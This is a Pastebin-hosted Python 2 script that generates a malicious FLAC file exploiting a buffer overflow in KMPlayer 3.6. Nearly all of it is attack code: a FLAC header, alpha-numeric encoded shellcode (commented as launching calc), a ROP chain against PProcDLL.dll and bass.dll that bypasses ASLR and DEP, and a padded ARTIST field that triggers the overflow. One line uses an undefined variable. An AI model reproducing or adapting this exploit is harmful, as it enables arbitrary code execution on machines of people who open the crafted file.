Guest User

KMPlayer 3.6 exploit

a guest
Nov 11th, 2015
3,877
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. from socket import *
  2. import sys
  3. import struct
  4. import time
  5.  
  6. """
  7. Kmplayer 3.6 Buffer Overflow exploit
  8. *Very* Low Reliablity :I
  9. By sweetchip
  10.  
  11. """
  12. print "\n[*] Kmplayer Exploit | Bypadd ASLR. DEP | ASCII only"
  13. print "[*] Author : sweetchip | 2013.04.18\n"
  14. print "[*] Public Release Date : 2015.11.12"
  15.  
  16. filename = "Exploit_bypass_ASLR_DEP.flac"
  17.  
  18. # Header
  19. Head1 = ("\x66\x4C\x61\x43\x00\x00\x00\x22\x10\x00\x10\x00\x00\x0B\x3E\x00\x2E"
  20.          "\x50\x0B\xB8\x02\xF0\x00\x91\x57\x93\x6F\x0C\x93\x12\xF9\xE0\x24\xF7"
  21.          "\x6B\x80\x38\x24\x7A\xBC\x64\x5A\x04")
  22. head2 = "\x00\x00\x00\x01\x00\x00\x00"
  23. EndofHead = ("\x81\x00\xA4\x46")
  24.  
  25. # cmd = calc
  26. # encoder - x86/alpha_mixed
  27. shellcode = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
  28.             "\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
  29.             "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42"
  30.             "\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x7a\x48"
  31.             "\x6c\x49\x55\x50\x53\x30\x43\x30\x55\x30\x4c\x49\x49\x75"
  32.             "\x54\x71\x4e\x32\x32\x44\x6c\x4b\x33\x62\x70\x30\x4e\x6b"
  33.             "\x62\x72\x56\x6c\x4c\x4b\x72\x72\x44\x54\x4e\x6b\x71\x62"
  34.             "\x35\x78\x64\x4f\x4d\x67\x42\x6a\x57\x56\x44\x71\x59\x6f"
  35.             "\x70\x31\x79\x50\x6e\x4c\x77\x4c\x70\x61\x61\x6c\x46\x62"
  36.             "\x44\x6c\x55\x70\x5a\x61\x68\x4f\x54\x4d\x67\x71\x58\x47"
  37.             "\x6a\x42\x58\x70\x32\x72\x71\x47\x4e\x6b\x46\x32\x52\x30"
  38.             "\x4e\x6b\x30\x42\x75\x6c\x75\x51\x6a\x70\x6e\x6b\x31\x50"
  39.             "\x50\x78\x4d\x55\x69\x50\x53\x44\x72\x6a\x37\x71\x38\x50"
  40.             "\x66\x30\x4e\x6b\x37\x38\x64\x58\x4e\x6b\x43\x68\x77\x50"
  41.             "\x36\x61\x59\x43\x6a\x43\x67\x4c\x73\x79\x4c\x4b\x54\x74"
  42.             "\x4e\x6b\x77\x71\x7a\x76\x55\x61\x79\x6f\x65\x61\x69\x50"
  43.             "\x4e\x4c\x69\x51\x5a\x6f\x44\x4d\x46\x61\x78\x47\x50\x38"
  44.             "\x49\x70\x30\x75\x4a\x54\x65\x53\x71\x6d\x38\x78\x75\x6b"
  45.             "\x73\x4d\x65\x74\x72\x55\x59\x72\x62\x78\x4c\x4b\x53\x68"
  46.             "\x36\x44\x57\x71\x69\x43\x62\x46\x6e\x6b\x74\x4c\x42\x6b"
  47.             "\x4c\x4b\x31\x48\x47\x6c\x63\x31\x78\x53\x6c\x4b\x37\x74"
  48.             "\x4e\x6b\x33\x31\x4a\x70\x6d\x59\x42\x64\x44\x64\x47\x54"
  49.             "\x51\x4b\x33\x6b\x35\x31\x31\x49\x33\x6a\x73\x61\x79\x6f"
  50.             "\x59\x70\x62\x78\x33\x6f\x33\x6a\x4e\x6b\x64\x52\x5a\x4b"
  51.             "\x6c\x46\x53\x6d\x30\x6a\x33\x31\x6c\x4d\x4e\x65\x4f\x49"
  52.             "\x45\x50\x33\x30\x37\x70\x36\x30\x51\x78\x46\x51\x6c\x4b"
  53.             "\x50\x6f\x6e\x67\x79\x6f\x78\x55\x4f\x4b\x48\x70\x4d\x65"
  54.             "\x6c\x62\x31\x46\x33\x58\x6c\x66\x4c\x55\x6f\x4d\x4d\x4d"
  55.             "\x4b\x4f\x48\x55\x35\x6c\x55\x56\x63\x4c\x77\x7a\x6d\x50"
  56.             "\x79\x6b\x39\x70\x74\x35\x45\x55\x4f\x4b\x62\x67\x46\x73"
  57.             "\x74\x32\x42\x4f\x63\x5a\x45\x50\x53\x63\x69\x6f\x4b\x65"
  58.             "\x55\x33\x43\x51\x52\x4c\x61\x73\x37\x70\x41\x41")
  59.  
  60.  
  61. #############################################################################################################################################
  62. ##### ROP
  63. ##### special thanks to mona and corelan team
  64. #############################################################################################################################################
  65. rop_gadgets = ""
  66. rop_gadgets += struct.pack('<I',0x10064b1f)# XCHG EAX,ESP # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
  67. rop_gadgets += struct.pack('<L',0x10126c47) #POP EAX # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
  68. rop_gadgets += struct.pack('<L',0x11047e74) # ptr to &VirtualProtect() [IAT bass.dll]
  69. rop_gadgets += struct.pack('<L',0x11024559) # ADD EAX,10B0 # RETN 0x04    ** [bass.dll] **   |  ascii {PAGE_EXECUTE_READWRITE}
  70. rop_gadgets += struct.pack('<L',0x11024559) # ADD EAX,10B0 # RETN 0x04    ** [bass.dll] **   |  ascii {PAGE_EXECUTE_READWRITE}
  71. rop_gadgets += "DEAD"
  72. rop_gadgets += struct.pack('<L',0x11024559) # ADD EAX,10B0 # RETN 0x04    ** [bass.dll] **   |  ascii {PAGE_EXECUTE_READWRITE}
  73. rop_gadgets += "BEEF"
  74. rop_gadgets += struct.pack('<L',0x11024559) # ADD EAX,10B0 # RETN 0x04    ** [bass.dll] **   |  ascii {PAGE_EXECUTE_READWRITE}
  75. rop_gadgets += "SWEE"
  76. rop_gadgets += struct.pack('<L',0x10120637) * 337 # INC EAX # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
  77. rop_gadgets += struct.pack('<L',0x11022f69) # MOV EAX,DWORD PTR DS:[EAX] # RETN [bass.dll]
  78. rop_gadgets += struct.pack('<L',0x11033e30) # XCHG EAX,ESI # RETN [bass.dll]
  79. rop_gadgets += struct.pack('<L',0x10060210) # POP EBP # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
  80. rop_gadgets += struct.pack('<L',0x10146f65) # PUSH ESP # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
  81. rop_gadgets += struct.pack('<L',0x11010754) # POP EBX # RETN    ** [bass.dll] **   |  ascii {PAGE_EXECUTE_READWRITE}
  82. rop_gadgets += struct.pack('<L',0x00005050) # 0x00000201-> ebx
  83. rop_gadgets += struct.pack('<L',0x10126623) # POP EDX # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
  84. rop_gadgets += struct.pack('<L',0x00000040) # 0x00000040-> edx
  85. rop_gadgets += struct.pack('<L',0x1013555c) # POP ECX # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
  86. rop_gadgets += struct.pack('<L',0x7d782020) # Writable location 7d782020
  87. rop_gadgets += struct.pack('<L',0x10120b13) # POP EDI # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
  88. rop_gadgets += struct.pack('<L',0x100d0240) # RETN (ROP NOP) [bass_wv.dll]
  89. rop_gadgets += struct.pack('<L',0x10126c47) # POP EAX # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
  90. rop_gadgets += struct.pack('<L',0x44444444) # inc inc inc inc lol
  91. rop_gadgets += struct.pack('<L',0x1001442e) # PUSHAD # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
  92. #############################################################################################################################################
  93.  
  94. stage1 = ""
  95. stage1 += "C" * 3028
  96. stage1 += rop_gadgets
  97. stage1 += shellcode
  98.  
  99. #65536
  100. # trigger a BOF / and will Execute shellcode
  101. artist = "ARTIST="
  102. artist += "A" * 60000
  103. artist += "A" * 4848
  104. artist += struct.pack('<I', 0x7d79192c)
  105. artist += "A" * 137
  106. artist += struct.pack('<I', 0x10402f0f) # POP ESP # RETN    ** [bass_flac.dll] **   |  ascii {PAGE_EXECUTE_READWRITE}
  107. artist += struct.pack('<I', 0x7d791930) # ptr to 7d761930
  108. artist += "B" * (140000 -4848-4-4-4-137)
  109. artist += stage1
  110. artist += "Z" * (65536-len(stage1))
  111. artist += stage1
  112. artist += "Z" * (65536-len(stage1))
  113. artist += stage1
  114. artist += "Z" * (65536-len(stage1))
  115. artist += stage1
  116. artist += "Z" * (65536-len(stage1))
  117. artist += stage1
  118. artist += "Z" * (65536-len(stage1))
  119. artist += stage1
  120. artist += "Z" * (65536-len(stage1))
  121. artist += stage1
  122. artist += "Z" * (65536-len(stage1))
  123.  
  124. #artist += "C" * 3028
  125. #artist += rop_gadgets
  126. #artist += shellcode
  127. sartist += "A" * 100000
  128. artistlength = struct.pack('<I', len(artist))
  129.  
  130. # length
  131. payloadlen = struct.pack('>I', len(head2 + EndofHead + artistlength + artist)*256)
  132.  
  133. # Payload.
  134. exploit = Head1
  135. exploit += payloadlen
  136. exploit += head2
  137. exploit += artistlength
  138. exploit += artist
  139. exploit += EndofHead
  140. exploit += "\x00" * 118000
  141.  
  142. print "\n[*] Generating Flac file....."
  143. print "[ ] Payload size :", (len(exploit))
  144. print "[ ] Shellcode size : \n"
  145.  
  146. f = open(filename,'w')
  147. f.write(exploit)
  148. f.close()
  149.  
  150. print "[*] Malicious File generated Successfully!!!"
  151. print "[ ] file name : " + filename
  152.  
  153. raw_input("\npress enter to continue :D . . . . .")
  154. #End OF Source.
RAW Paste Data